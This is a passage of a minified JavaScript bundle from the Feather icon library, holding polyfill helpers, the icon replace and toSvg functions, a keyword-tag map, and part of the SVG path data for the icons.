}(e, l) : Array.isArray(l) ? n(e, l) : "object" === r ? function (e, n) {
for (var t in n) i.call(n, t) && (e[t] = !!n[t])
}(e, l) : "number" === r && function (e, n) {
e[n] = !0
}(e, l)
}
}
return function () {
for (var i = arguments.length, t = Array(i), l = 0; l < i; l++) t[l] = arguments[l];
var r = new e;
n(r, t);
var o = [];
for (var a in r) r[a] && o.push(a);
return o.join(" ")
}
}();
void 0 !== e && e.exports ? e.exports = i : void 0 === (t = function () {
return i
}.apply(n, [])) || (e.exports = t)
}()
}, function (e, n, i) {
var t = i(7).f,
l = i(1),
r = i(2)("toStringTag");
e.exports = function (e, n, i) {
e && !l(e = i ? e : e.prototype, r) && t(e, r, {
configurable: !0,
value: n
})
}
}, function (e, n, i) {
var t = i(20);
e.exports = function (e) {
return Object(t(e))
}
}, function (e, n, i) {
var t = i(1),
l = i(24),
r = i(16),
o = i(63),
a = r("IE_PROTO"),
c = Object.prototype;
e.exports = o ? Object.getPrototypeOf : function (e) {
return e = l(e), t(e, a) ? e[a] : "function" == typeof e.constructor && e instanceof e.constructor ? e.constructor.prototype : e instanceof Object ? c : null
}
}, function (e, n, i) {
"use strict";
var t, l, r, o = i(25),
a = i(5),
c = i(1),
p = i(2),
y = i(17),
h = p("iterator"),
x = !1;
[].keys && ("next" in (r = [].keys()) ? (l = o(o(r))) !== Object.prototype && (t = l) : x = !0), void 0 == t && (t = {}), y || c(t, h) || a(t, h, function () {
return this
}), e.exports = {
IteratorPrototype: t,
BUGGY_SAFARI_ITERATORS: x
}
}, function (e, n, i) {
var t = i(21),
l = Math.min;
e.exports = function (e) {
return e > 0 ? l(t(e), 9007199254740991) : 0
}
}, function (e, n, i) {
var t = i(1),
l = i(14),
r = i(68),
o = i(15),
a = r(!1);
e.exports = function (e, n) {
var i, r = l(e),
c = 0,
p = [];
for (i in r) !t(o, i) && t(r, i) && p.push(i);
for (; n.length > c;) t(r, i = n[c++]) && (~a(p, i) || p.push(i));
return p
}
}, function (e, n, i) {
var t = i(0),
l = i(11),
r = i(5),
o = i(1),
a = i(19),
c = i(36),
p = i(37),
y = p.get,
h = p.enforce,
x = String(c).split("toString");
l("inspectSource", function (e) {
return c.call(e)
}), (e.exports = function (e, n, i, l) {
var c = !!l && !!l.unsafe,
p = !!l && !!l.enumerable,
y = !!l && !!l.noTargetGet;
"function" == typeof i && ("string" != typeof n || o(i, "name") || r(i, "name", n), h(i).source = x.join("string" == typeof n ? n : "")), e !== t ? (c ? !y && e[n] && (p = !0) : delete e[n], p ? e[n] = i : r(e, n, i)) : p ? e[n] = i : a(n, i)
})(Function.prototype, "toString", function () {
return "function" == typeof this && y(this).source || c.call(this)
})
}, function (e, n) {
var i = {}.toString;
e.exports = function (e) {
return i.call(e).slice(8, -1)
}
}, function (e, n, i) {
var t = i(8),
l = i(73),
r = i(10),
o = i(14),
a = i(18),
c = i(1),
p = i(35),
y = Object.getOwnPropertyDescriptor;
n.f = t ? y : function (e, n) {
if (e = o(e), n = a(n, !0), p) try {
return y(e, n)
} catch (e) {}
if (c(e, n)) return r(!l.f.call(e, n), e[n])
}
}, function (e, n, i) {
var t = i(0),
l = i(31).f,
r = i(5),
o = i(29),
a = i(19),
c = i(71),
p = i(65);
e.exports = function (e, n) {
var i, y, h, x, s, u = e.target,
d = e.global,
f = e.stat;
if (i = d ? t : f ? t[u] || a(u, {}) : (t[u] || {}).prototype)
for (y in n) {
if (x = n[y], h = e.noTargetGet ? (s = l(i, y)) && s.value : i[y], !p(d ? y : u + (f ? "." : "#") + y, e.forced) && void 0 !== h) {
if (typeof x == typeof h) continue;
c(x, h)
}(e.sham || h && h.sham) && r(x, "sham", !0), o(i, y, x, e)
}
}
}, function (e, n) {
var i = 0,
t = Math.random();
e.exports = function (e) {
return "Symbol(".concat(void 0 === e ? "" : e, ")_", (++i + t).toString(36))
}
}, function (e, n, i) {
var t = i(0),
l = i(6),
r = t.document,
o = l(r) && l(r.createElement);
e.exports = function (e) {
return o ? r.createElement(e) : {}
}
}, function (e, n, i) {
var t = i(8),
l = i(4),
r = i(34);
e.exports = !t && !l(function () {
return 7 != Object.defineProperty(r("div"), "a", {
get: function () {
return 7
}
}).a
})
}, function (e, n, i) {
var t = i(11);
e.exports = t("native-function-to-string", Function.toString)
}, function (e, n, i) {
var t, l, r, o = i(76),
a = i(0),
c = i(6),
p = i(5),
y = i(1),
h = i(16),
x = i(15),
s = a.WeakMap;
if (o) {
var u = new s,
d = u.get,
f = u.has,
g = u.set;
t = function (e, n) {
return g.call(u, e, n), n
}, l = function (e) {
return d.call(u, e) || {}
}, r = function (e) {
return f.call(u, e)
}
} else {
var v = h("state");
x[v] = !0, t = function (e, n) {
return p(e, v, n), n
}, l = function (e) {
return y(e, v) ? e[v] : {}
}, r = function (e) {
return y(e, v)
}
}
e.exports = {
set: t,
get: l,
has: r,
enforce: function (e) {
return r(e) ? l(e) : t(e, {})
},
getterFor: function (e) {
return function (n) {
var i;
if (!c(n) || (i = l(n)).type !== e) throw TypeError("Incompatible receiver, " + e + " required");
return i
}
}
}
}, function (e, n, i) {
"use strict";
Object.defineProperty(n, "__esModule", {
value: !0
});
var t = Object.assign || function (e) {
for (var n = 1; n < arguments.length; n++) {
var i = arguments[n];
for (var t in i) Object.prototype.hasOwnProperty.call(i, t) && (e[t] = i[t])
}
return e
},
l = o(i(22)),
r = o(i(12));
function o(e) {
return e && e.__esModule ? e : {
default: e
}
}
n.default = function () {
var e = arguments.length > 0 && void 0 !== arguments[0] ? arguments[0] : {};
if ("undefined" == typeof document) throw new Error("`feather.replace()` only works in a browser environment.");
var n = document.querySelectorAll("[data-feather]");
Array.from(n).forEach(function (n) {
return function (e) {
var n = arguments.length > 1 && void 0 !== arguments[1] ? arguments[1] : {},
i = function (e) {
return Array.from(e.attributes).reduce(function (e, n) {
return e[n.name] = n.value, e
}, {})
}(e),
o = i["data-feather"];
delete i["data-feather"];
var a = r.default[o].toSvg(t({}, n, i, {
class: (0, l.default)(n.class, i.class)
})),
c = (new DOMParser).parseFromString(a, "image/svg+xml").querySelector("svg");
e.parentNode.replaceChild(c, e)
}(n, e)
})
}
}, function (e, n, i) {
"use strict";
Object.defineProperty(n, "__esModule", {
value: !0
});
var t, l = i(12),
r = (t = l) && t.__esModule ? t : {
default: t
};
n.default = function (e) {
var n = arguments.length > 1 && void 0 !== arguments[1] ? arguments[1] : {};
if (console.warn("feather.toSvg() is deprecated. Please use feather.icons[name].toSvg() instead."), !e) throw new Error("The required `key` (icon name) parameter is missing.");
if (!r.default[e]) throw new Error("No icon matching '" + e + "'. See the complete list of icons at https://feathericons.com");
return r.default[e].toSvg(n)
}
}, function (e) {
e.exports = {
activity: ["pulse", "health", "action", "motion"],
airplay: ["stream", "cast", "mirroring"],
"alert-circle": ["warning", "alert", "danger"],
"alert-octagon": ["warning", "alert", "danger"],
"alert-triangle": ["warning", "alert", "danger"],
"align-center": ["text alignment", "center"],
"align-justify": ["text alignment", "justified"],
"align-left": ["text alignment", "left"],
"align-right": ["text alignment", "right"],
anchor: [],
archive: ["index", "box"],
"at-sign": ["mention", "at", "email", "message"],
award: ["achievement", "badge"],
aperture: ["camera", "photo"],
"bar-chart": ["statistics", "diagram", "graph"],
"bar-chart-2": ["statistics", "diagram", "graph"],
battery: ["power", "electricity"],
"battery-charging": ["power", "electricity"],
bell: ["alarm", "notification", "sound"],
"bell-off": ["alarm", "notification", "silent"],
bluetooth: ["wireless"],
"book-open": ["read", "library"],
book: ["read", "dictionary", "booklet", "magazine", "library"],
bookmark: ["read", "clip", "marker", "tag"],
box: ["cube"],
briefcase: ["work", "bag", "baggage", "folder"],
calendar: ["date"],
camera: ["photo"],
cast: ["chromecast", "airplay"],
circle: ["off", "zero", "record"],
clipboard: ["copy"],
clock: ["time", "watch", "alarm"],
"cloud-drizzle": ["weather", "shower"],
"cloud-lightning": ["weather", "bolt"],
"cloud-rain": ["weather"],
"cloud-snow": ["weather", "blizzard"],
cloud: ["weather"],
codepen: ["logo"],
codesandbox: ["logo"],
code: ["source", "programming"],
coffee: ["drink", "cup", "mug", "tea", "cafe", "hot", "beverage"],
columns: ["layout"],
command: ["keyboard", "cmd", "terminal", "prompt"],
compass: ["navigation", "safari", "travel", "direction"],
copy: ["clone", "duplicate"],
"corner-down-left": ["arrow", "return"],
"corner-down-right": ["arrow"],
"corner-left-down": ["arrow"],
"corner-left-up": ["arrow"],
"corner-right-down": ["arrow"],
"corner-right-up": ["arrow"],
"corner-up-left": ["arrow"],
"corner-up-right": ["arrow"],
cpu: ["processor", "technology"],
"credit-card": ["purchase", "payment", "cc"],
crop: ["photo", "image"],
crosshair: ["aim", "target"],
database: ["storage", "memory"],
delete: ["remove"],
disc: ["album", "cd", "dvd", "music"],
"dollar-sign": ["currency", "money", "payment"],
droplet: ["water"],
edit: ["pencil", "change"],
"edit-2": ["pencil", "change"],
"edit-3": ["pencil", "change"],
eye: ["view", "watch"],
"eye-off": ["view", "watch", "hide", "hidden"],
"external-link": ["outbound"],
facebook: ["logo", "social"],
"fast-forward": ["music"],
figma: ["logo", "design", "tool"],
"file-minus": ["delete", "remove", "erase"],
"file-plus": ["add", "create", "new"],
"file-text": ["data", "txt", "pdf"],
film: ["movie", "video"],
filter: ["funnel", "hopper"],
flag: ["report"],
"folder-minus": ["directory"],
"folder-plus": ["directory"],
folder: ["directory"],
framer: ["logo", "design", "tool"],
frown: ["emoji", "face", "bad", "sad", "emotion"],
gift: ["present", "box", "birthday", "party"],
"git-branch": ["code", "version control"],
"git-commit": ["code", "version control"],
"git-merge": ["code", "version control"],
"git-pull-request": ["code", "version control"],
github: ["logo", "version control"],
gitlab: ["logo", "version control"],
globe: ["world", "browser", "language", "translate"],
"hard-drive": ["computer", "server", "memory", "data"],
hash: ["hashtag", "number", "pound"],
headphones: ["music", "audio", "sound"],
heart: ["like", "love", "emotion"],
"help-circle": ["question mark"],
hexagon: ["shape", "node.js", "logo"],
home: ["house", "living"],
image: ["picture"],
inbox: ["email"],
instagram: ["logo", "camera"],
key: ["password", "login", "authentication", "secure"],
layers: ["stack"],
layout: ["window", "webpage"],
"life-bouy": ["help", "life ring", "support"],
link: ["chain", "url"],
"link-2": ["chain", "url"],
linkedin: ["logo", "social media"],
list: ["options"],
lock: ["security", "password", "secure"],
"log-in": ["sign in", "arrow", "enter"],
"log-out": ["sign out", "arrow", "exit"],
mail: ["email", "message"],
"map-pin": ["location", "navigation", "travel", "marker"],
map: ["location", "navigation", "travel"],
maximize: ["fullscreen"],
"maximize-2": ["fullscreen", "arrows", "expand"],
meh: ["emoji", "face", "neutral", "emotion"],
menu: ["bars", "navigation", "hamburger"],
"message-circle": ["comment", "chat"],
"message-square": ["comment", "chat"],
"mic-off": ["record", "sound", "mute"],
mic: ["record", "sound", "listen"],
minimize: ["exit fullscreen", "close"],
"minimize-2": ["exit fullscreen", "arrows", "close"],
minus: ["subtract"],
monitor: ["tv", "screen", "display"],
moon: ["dark", "night"],
"more-horizontal": ["ellipsis"],
"more-vertical": ["ellipsis"],
"mouse-pointer": ["arrow", "cursor"],
move: ["arrows"],
music: ["note"],
navigation: ["location", "travel"],
"navigation-2": ["location", "travel"],
octagon: ["stop"],
package: ["box", "container"],
paperclip: ["attachment"],
pause: ["music", "stop"],
"pause-circle": ["music", "audio", "stop"],
"pen-tool": ["vector", "drawing"],
percent: ["discount"],
"phone-call": ["ring"],
"phone-forwarded": ["call"],
"phone-incoming": ["call"],
"phone-missed": ["call"],
"phone-off": ["call", "mute"],
"phone-outgoing": ["call"],
phone: ["call"],
play: ["music", "start"],
"pie-chart": ["statistics", "diagram"],
"play-circle": ["music", "start"],
plus: ["add", "new"],
"plus-circle": ["add", "new"],
"plus-square": ["add", "new"],
pocket: ["logo", "save"],
power: ["on", "off"],
printer: ["fax", "office", "device"],
radio: ["signal"],
"refresh-cw": ["synchronise", "arrows"],
"refresh-ccw": ["arrows"],
repeat: ["loop", "arrows"],
rewind: ["music"],
"rotate-ccw": ["arrow"],
"rotate-cw": ["arrow"],
rss: ["feed", "subscribe"],
save: ["floppy disk"],
scissors: ["cut"],
search: ["find", "magnifier", "magnifying glass"],
send: ["message", "mail", "email", "paper airplane", "paper aeroplane"],
settings: ["cog", "edit", "gear", "preferences"],
"share-2": ["network", "connections"],
shield: ["security", "secure"],
"shield-off": ["security", "insecure"],
"shopping-bag": ["ecommerce", "cart", "purchase", "store"],
"shopping-cart": ["ecommerce", "cart", "purchase", "store"],
shuffle: ["music"],
"skip-back": ["music"],
"skip-forward": ["music"],
slack: ["logo"],
slash: ["ban", "no"],
sliders: ["settings", "controls"],
smartphone: ["cellphone", "device"],
smile: ["emoji", "face", "happy", "good", "emotion"],
speaker: ["audio", "music"],
star: ["bookmark", "favorite", "like"],
"stop-circle": ["media", "music"],
sun: ["brightness", "weather", "light"],
sunrise: ["weather", "time", "morning", "day"],
sunset: ["weather", "time", "evening", "night"],
tablet: ["device"],
tag: ["label"],
target: ["logo", "bullseye"],
terminal: ["code", "command line", "prompt"],
thermometer: ["temperature", "celsius", "fahrenheit", "weather"],
"thumbs-down": ["dislike", "bad", "emotion"],
"thumbs-up": ["like", "good", "emotion"],
"toggle-left": ["on", "off", "switch"],
"toggle-right": ["on", "off", "switch"],
tool: ["settings", "spanner"],
trash: ["garbage", "delete", "remove", "bin"],
"trash-2": ["garbage", "delete", "remove", "bin"],
triangle: ["delta"],
truck: ["delivery", "van", "shipping", "transport", "lorry"],
tv: ["television", "stream"],
twitch: ["logo"],
twitter: ["logo", "social"],
type: ["text"],
umbrella: ["rain", "weather"],
unlock: ["security"],
"user-check": ["followed", "subscribed"],
"user-minus": ["delete", "remove", "unfollow", "unsubscribe"],
"user-plus": ["new", "add", "create", "follow", "subscribe"],
"user-x": ["delete", "remove", "unfollow", "unsubscribe", "unavailable"],
user: ["person", "account"],
users: ["group"],
"video-off": ["camera", "movie", "film"],
video: ["camera", "movie", "film"],
voicemail: ["phone"],
volume: ["music", "sound", "mute"],
"volume-1": ["music", "sound"],
"volume-2": ["music", "sound"],
"volume-x": ["music", "sound", "mute"],
watch: ["clock", "time"],
"wifi-off": ["disabled"],
wifi: ["connection", "signal", "wireless"],
wind: ["weather", "air"],
"x-circle": ["cancel", "close", "delete", "remove", "times", "clear"],
"x-octagon": ["delete", "stop", "alert", "warning", "times", "clear"],
"x-square": ["cancel", "close", "delete", "remove", "times", "clear"],
x: ["cancel", "close", "delete", "remove", "times", "clear"],
youtube: ["logo", "video", "play"],
"zap-off": ["flash", "camera", "lightning"],
zap: ["flash", "camera", "lightning"],
"zoom-in": ["magnifying glass"],
"zoom-out": ["magnifying glass"]
}
}, function (e) {
e.exports = {
activity: '<polyline points="22 12 18 12 15 21 9 3 6 12 2 12"></polyline>',
airplay: '<path d="M5 17H4a2 2 0 0 1-2-2V5a2 2 0 0 1 2-2h16a2 2 0 0 1 2 2v10a2 2 0 0 1-2 2h-1"></path><polygon points="12 15 17 21 7 21 12 15"></polygon>',
"alert-circle": '<circle cx="12" cy="12" r="10"></circle><line x1="12" y1="8" x2="12" y2="12"></line><line x1="12" y1="16" x2="12.01" y2="16"></line>',
"alert-octagon": '<polygon points="7.86 2 16.14 2 22 7.86 22 16.14 16.14 22 7.86 22 2 16.14 2 7.86 7.86 2"></polygon><line x1="12" y1="8" x2="12" y2="12"></line><line x1="12" y1="16" x2="12.01" y2="16"></line>',
"alert-triangle": '<path d="M10.29 3.86L1.82 18a2 2 0 0 0 1.71 3h16.94a2 2 0 0 0 1.71-3L13.71 3.86a2 2 0 0 0-3.42 0z"></path><line x1="12" y1="9" x2="12" y2="13"></line><line x1="12" y1="17" x2="12.01" y2="17"></line>',
"align-center": '<line x1="18" y1="10" x2="6" y2="10"></line><line x1="21" y1="6" x2="3" y2="6"></line><line x1="21" y1="14" x2="3" y2="14"></line><line x1="18" y1="18" x2="6" y2="18"></line>',
"align-justify": '<line x1="21" y1="10" x2="3" y2="10"></line><line x1="21" y1="6" x2="3" y2="6"></line><line x1="21" y1="14" x2="3" y2="14"></line><line x1="21" y1="18" x2="3" y2="18"></line>',
"align-left": '<line x1="17" y1="10" x2="3" y2="10"></line><line x1="21" y1="6" x2="3" y2="6"></line><line x1="21" y1="14" x2="3" y2="14"></line><line x1="17" y1="18" x2="3" y2="18"></line>',
"align-right": '<line x1="21" y1="10" x2="7" y2="10"></line><line x1="21" y1="6" x2="3" y2="6"></line><line x1="21" y1="14" x2="3" y2="14"></line><line x1="21" y1="18" x2="7" y2="18"></line>',
anchor: '<circle cx="12" cy="5" r="3"></circle><line x1="12" y1="22" x2="12" y2="8"></line><path d="M5 12H2a10 10 0 0 0 20 0h-3"></path>',
aperture: '<circle cx="12" cy="12" r="10"></circle><line x1="14.31" y1="8" x2="20.05" y2="17.94"></line><line x1="9.69" y1="8" x2="21.17" y2="8"></line><line x1="7.38" y1="12" x2="13.12" y2="2.06"></line><line x1="9.69" y1="16" x2="3.95" y2="6.06"></line><line x1="14.31" y1="16" x2="2.83" y2="16"></line><line x1="16.62" y1="12" x2="10.88" y2="21.94"></line>',
archive: '<polyline points="21 8 21 21 3 21 3 8"></polyline><rect x="1" y="3" width="22" height="5"></rect><line x1="10" y1="12" x2="14" y2="12"></line>',
"arrow-down-circle": '<circle cx="12" cy="12" r="10"></circle><polyline points="8 12 12 16 16 12"></polyline><line x1="12" y1="8" x2="12" y2="16"></line>',
"arrow-down-left": '<line x1="17" y1="7" x2="7" y2="17"></line><polyline points="17 17 7 17 7 7"></polyline>',
"arrow-down-right": '<line x1="7" y1="7" x2="17" y2="17"></line><polyline points="17 7 17 17 7 17"></polyline>',
"arrow-down": '<line x1="12" y1="5" x2="12" y2="19"></line><polyline points="19 12 12 19 5 12"></polyline>',
"arrow-left-circle": '<circle cx="12" cy="12" r="10"></circle><polyline points="12 8 8 12 12 16"></polyline><line x1="16" y1="12" x2="8" y2="12"></line>',
"arrow-left": '<line x1="19" y1="12" x2="5" y2="12"></line><polyline points="12 19 5 12 12 5"></polyline>',
"arrow-right-circle": '<circle cx="12" cy="12" r="10"></circle><polyline points="12 16 16 12 12 8"></polyline><line x1="8" y1="12" x2="16" y2="12"></line>',
"arrow-right": '<line x1="5" y1="12" x2="19" y2="12"></line><polyline points="12 5 19 12 12 19"></polyline>',
"arrow-up-circle": '<circle cx="12" cy="12" r="10"></circle><polyline points="16 12 12 8 8 12"></polyline><line x1="12" y1="16" x2="12" y2="8"></line>',
"arrow-up-left": '<line x1="17" y1="17" x2="7" y2="7"></line><polyline points="7 17 7 7 17 7"></polyline>',
"arrow-up-right": '<line x1="7" y1="17" x2="17" y2="7"></line><polyline points="7 7 17 7 17 17"></polyline>',
"arrow-up": '<line x1="12" y1="19" x2="12" y2="5"></line><polyline points="5 12 12 5 19 12"></polyline>',
"at-sign": '<circle cx="12" cy="12" r="4"></circle><path d="M16 8v5a3 3 0 0 0 6 0v-1a10 10 0 1 0-3.92 7.94"></path>',
award: '<circle cx="12" cy="8" r="7"></circle><polyline points="8.21 13.89 7 23 12 20 17 23 15.79 13.88"></polyline>',
"bar-chart-2": '<line x1="18" y1="20" x2="18" y2="10"></line><line x1="12" y1="20" x2="12" y2="4"></line><line x1="6" y1="20" x2="6" y2="14"></line>',
"bar-chart": '<line x1="12" y1="20" x2="12" y2="10"></line><line x1="18" y1="20" x2="18" y2="4"></line><line x1="6" y1="20" x2="6" y2="16"></line>',
"battery-charging": '<path d="M5 18H3a2 2 0 0 1-2-2V8a2 2 0 0 1 2-2h3.19M15 6h2a2 2 0 0 1 2 2v8a2 2 0 0 1-2 2h-3.19"></path><line x1="23" y1="13" x2="23" y2="11"></line><polyline points="11 6 7 12 13 12 9 18"></polyline>',
battery: '<rect x="1" y="6" width="18" height="12" rx="2" ry="2"></rect><line x1="23" y1="13" x2="23" y2="11"></line>',
"bell-off": '<path d="M13.73 21a2 2 0 0 1-3.46 0"></path><path d="M18.63 13A17.89 17.89 0 0 1 18 8"></path><path d="M6.26 6.26A5.86 5.86 0 0 0 6 8c0 7-3 9-3 9h14"></path><path d="M18 8a6 6 0 0 0-9.33-5"></path><line x1="1" y1="1" x2="23" y2="23"></line>',
bell: '<path d="M18 8A6 6 0 0 0 6 8c0 7-3 9-3 9h18s-3-2-3-9"></path><path d="M13.73 21a2 2 0 0 1-3.46 0"></path>',
bluetooth: '<polyline points="6.5 6.5 17.5 17.5 12 23 12 1 17.5 6.5 6.5 17.5"></polyline>',
bold: '<path d="M6 4h8a4 4 0 0 1 4 4 4 4 0 0 1-4 4H6z"></path><path d="M6 12h9a4 4 0 0 1 4 4 4 4 0 0 1-4 4H6z"></path>',
"book-open": '<path d="M2 3h6a4 4 0 0 1 4 4v14a3 3 0 0 0-3-3H2z"></path><path d="M22 3h-6a4 4 0 0 0-4 4v14a3 3 0 0 1 3-3h7z"></path>',
book: '<path d="M4 19.5A2.5 2.5 0 0 1 6.5 17H20"></path><path d="M6.5 2H20v20H6.5A2.5 2.5 0 0 1 4 19.5v-15A2.5 2.5 0 0 1 6.5 2z"></path>',
bookmark: '<path d="M19 21l-7-5-7 5V5a2 2 0 0 1 2-2h10a2 2 0 0 1 2 2z"></path>',
box: '<path d="M21 16V8a2 2 0 0 0-1-1.73l-7-4a2 2 0 0 0-2 0l-7 4A2 2 0 0 0 3 8v8a2 2 0 0 0 1 1.73l7 4a2 2 0 0 0 2 0l7-4A2 2 0 0 0 21 16z"></path><polyline points="3.27 6.96 12 12.01 20.73 6.96"></polyline><line x1="12" y1="22.08" x2="12" y2="12"></line>',
briefcase: '<rect x="2" y="7" width="20" height="14" rx="2" ry="2"></rect><path d="M16 21V5a2 2 0 0 0-2-2h-4a2 2 0 0 0-2 2v16"></path>',
calendar: '<rect x="3" y="4" width="18" height="18" rx="2" ry="2"></rect><line x1="16" y1="2" x2="16" y2="6"></line><line x1="8" y1="2" x2="8" y2="6"></line><line x1="3" y1="10" x2="21" y2="10"></line>',
"camera-off": '<line x1="1" y1="1" x2="23" y2="23"></line><path d="M21 21H3a2 2 0 0 1-2-2V8a2 2 0 0 1 2-2h3m3-3h6l2 3h4a2 2 0 0 1 2 2v9.34m-7.72-2.06a4 4 0 1 1-5.56-5.56"></path>',
camera: '<path d="M23 19a2 2 0 0 1-2 2H3a2 2 0 0 1-2-2V8a2 2 0 0 1 2-2h4l2-3h6l2 3h4a2 2 0 0 1 2 2z"></path><circle cx="12" cy="13" r="4"></circle>',
cast: '<path d="M2 16.1A5 5 0 0 1 5.9 20M2 12.05A9 9 0 0 1 9.95 20M2 8V6a2 2 0 0 1 2-2h16a2 2 0 0 1 2 2v12a2 2 0 0 1-2 2h-6"></path><line x1="2" y1="20" x2="2.01" y2="20"></line>',
"check-circle": '<path d="M22 11.08V12a10 10 0 1 1-5.93-9.14"></path><polyline points="22 4 12 14.01 9 11.01"></polyline>',
"check-square": '<polyline points="9 11 12 14 22 4"></polyline><path d="M21 12v7a2 2 0 0 1-2 2H5a2 2 0 0 1-2-2V5a2 2 0 0 1 2-2h11"></path>',
check: '<polyline points="20 6 9 17 4 12"></polyline>',
"chevron-down": '<polyline points="6 9 12 15 18 9"></polyline>',
"chevron-left": '<polyline points="15 18 9 12 15 6"></polyline>',
"chevron-right": '<polyline points="9 18 15 12 9 6"></polyline>',
"chevron-up": '<polyline points="18 15 12 9 6 15"></polyline>',
"chevrons-down": '<polyline points="7 13 12 18 17 13"></polyline><polyline points="7 6 12 11 17 6"></polyline>',
"chevrons-left": '<polyline points="11 17 6 12 11 7"></polyline><polyline points="18 17 13 12 18 7"></polyline>',
"chevrons-right": '<polyline points="13 17 18 12 13 7"></polyline><polyline points="6 17 11 12 6 7"></polyline>',
"chevrons-up": '<polyline points="17 11 12 6 7 11"></polyline><polyline points="17 18 12 13 7 18"></polyline>',
chrome: '<circle cx="12" cy="12" r="10"></circle><circle cx="12" cy="12" r="4"></circle><line x1="21.17" y1="8" x2="12" y2="8"></line><line x1="3.95" y1="6.06" x2="8.54" y2="14"></line><line x1="10.88" y1="21.94" x2="15.46" y2="14"></line>',
circle: '<circle cx="12" cy="12" r="10"></circle>',
clipboard: '<path d="M16 4h2a2 2 0 0 1 2 2v14a2 2 0 0 1-2 2H6a2 2 0 0 1-2-2V6a2 2 0 0 1 2-2h2"></path><rect x="8" y="2" width="8" height="4" rx="1" ry="1"></rect>',
clock: '<circle cx="12" cy="12" r="10"></circle><polyline points="12 6 12 12 16 14"></polyline>',
"cloud-drizzle": '<line x1="8" y1="19" x2="8" y2="21"></line><line x1="8" y1="13" x2="8" y2="15"></line><line x1="16" y1="19" x2="16" y2="21"></line><line x1="16" y1="13" x2="16" y2="15"></line><line x1="12" y1="21" x2="12" y2="23"></line><line x1="12" y1="15" x2="12" y2="17"></line><path d="M20 16.58A5 5 0 0 0 18 7h-1.26A8 8 0 1 0 4 15.25"></path>',
"cloud-lightning": '<path d="M19 16.9A5 5 0 0 0 18 7h-1.26a8 8 0 1 0-11.62 9"></path><polyline points="13 11 9 17 15 17 11 23"></polyline>',
"cloud-off": '<path d="M22.61 16.95A5 5 0 0 0 18 10h-1.26a8 8 0 0 0-7.05-6M5 5a8 8 0 0 0 4 15h9a5 5 0 0 0 1.7-.3"></path><line x1="1" y1="1" x2="23" y2="23"></line>',
"cloud-rain": '<line x1="16" y1="13" x2="16" y2="21"></line><line x1="8" y1="13" x2="8" y2="21"></line><line x1="12" y1="15" x2="12" y2="23"></line><path d="M20 16.58A5 5 0 0 0 18 7h-1.26A8 8 0 1 0 4 15.25"></path>',
"cloud-snow": '<path d="M20 17.58A5 5 0 0 0 18 8h-1.26A8 8 0 1 0 4 16.25"></path><line x1="8" y1="16" x2="8.01" y2="16"></line><line x1="8" y1="20" x2="8.01" y2="20"></line><line x1="12" y1="18" x2="12.01" y2="18"></line><line x1="12" y1="22" x2="12.01" y2="22"></line><line x1="16" y1="16" x2="16.01" y2="16"></line><line x1="16" y1="20" x2="16.01" y2="20"></line>',
cloud: '<path d="M18 10h-1.26A8 8 0 1 0 9 20h9a5 5 0 0 0 0-10z"></path>',
code: '<polyline points="16 18 22 12 16 6"></polyline><polyline points="8 6 2 12 8 18"></polyline>',
codepen: '<polygon points="12 2 22 8.5 22 15.5 12 22 2 15.5 2 8.5 12 2"></polygon><line x1="12" y1="22" x2="12" y2="15.5"></line><polyline points="22 8.5 12 15.5 2 8.5"></polyline><polyline points="2 15.5 12 8.5 22 15.5"></polyline><line x1="12" y1="2" x2="12" y2="8.5"></line>',
codesandbox: '<path d="M21 16V8a2 2 0 0 0-1-1.73l-7-4a2 2 0 0 0-2 0l-7 4A2 2 0 0 0 3 8v8a2 2 0 0 0 1 1.73l7 4a2 2 0 0 0 2 0l7-4A2 2 0 0 0 21 16z"></path><polyline points="7.5 4.21 12 6.81 16.5 4.21"></polyline><polyline points="7.5 19.79 7.5 14.6 3 12"></polyline><polyline points="21 12 16.5 14.6 16.5 19.79"></polyline><polyline points="3.27 6.96 12 12.01 20.73 6.96"></polyline><line x1="12" y1="22.08" x2="12" y2="12"></line>',
coffee: '<path d="M18 8h1a4 4 0 0 1 0 8h-1"></path><path d="M2 8h16v9a4 4 0 0 1-4 4H6a4 4 0 0 1-4-4V8z"></path><line x1="6" y1="1" x2="6" y2="4"></line><line x1="10" y1="1" x2="10" y2="4"></line><line x1="14" y1="1" x2="14" y2="4"></line>',
columns: '<path d="M12 3h7a2 2 0 0 1 2 2v14a2 2 0 0 1-2 2h-7m0-18H5a2 2 0 0 0-2 2v14a2 2 0 0 0 2 2h7m0-18v18"></path>',
command: '<path d="M18 3a3 3 0 0 0-3 3v12a3 3 0 0 0 3 3 3 3 0 0 0 3-3 3 3 0 0 0-3-3H6a3 3 0 0 0-3 3 3 3 0 0 0 3 3 3 3 0 0 0 3-3V6a3 3 0 0 0-3-3 3 3 0 0 0-3 3 3 3 0 0 0 3 3h12a3 3 0 0 0 3-3 3 3 0 0 0-3-3z"></path>',
compass: '<circle cx="12" cy="12" r="10"></circle><polygon points="16.24 7.76 14.12 14.12 7.76 16.24 9.88 9.88 16.24 7.76"></polygon>',
copy: '<rect x="9" y="9" width="13" height="13" rx="2" ry="2"></rect><path d="M5 15H4a2 2 0 0 1-2-2V4a2 2 0 0 1 2-2h9a2 2 0 0 1 2 2v1"></path>',
"corner-down-left": '<polyline points="9 10 4 15 9 20"></polyline><path d="M20 4v7a4 4 0 0 1-4 4H4"></path>',
"corner-down-right": '<polyline points="15 10 20 15 15 20"></polyline><path d="M4 4v7a4 4 0 0 0 4 4h12"></path>',
"corner-left-down": '<polyline points="14 15 9 20 4 15"></polyline><path d="M20 4h-7a4 4 0 0 0-4 4v12"></path>',
"corner-left-up": '<polyline points="14 9 9 4 4 9"></polyline><path d="M20 20h-7a4 4 0 0 1-4-4V4"></path>',
"corner-right-down": '<polyline points="10 15 15 20 20 15"></polyline><path d="M4 4h7a4 4 0 0 1 4 4v12"></path>',
"corner-right-up": '<polyline points="10 9 15 4 20 9"></polyline><path d="M4 20h7a4 4 0 0 0 4-4V4"></path>',
"corner-up-left": '<polyline points="9 14 4 9 9 4"></polyline><path d="M20 20v-7a4 4 0 0 0-4-4H4"></path>',
"corner-up-right": '<polyline points="15 14 20 9 15 4"></polyline><path d="M4 20v-7a4 4 0 0 1 4-4h12"></path>',
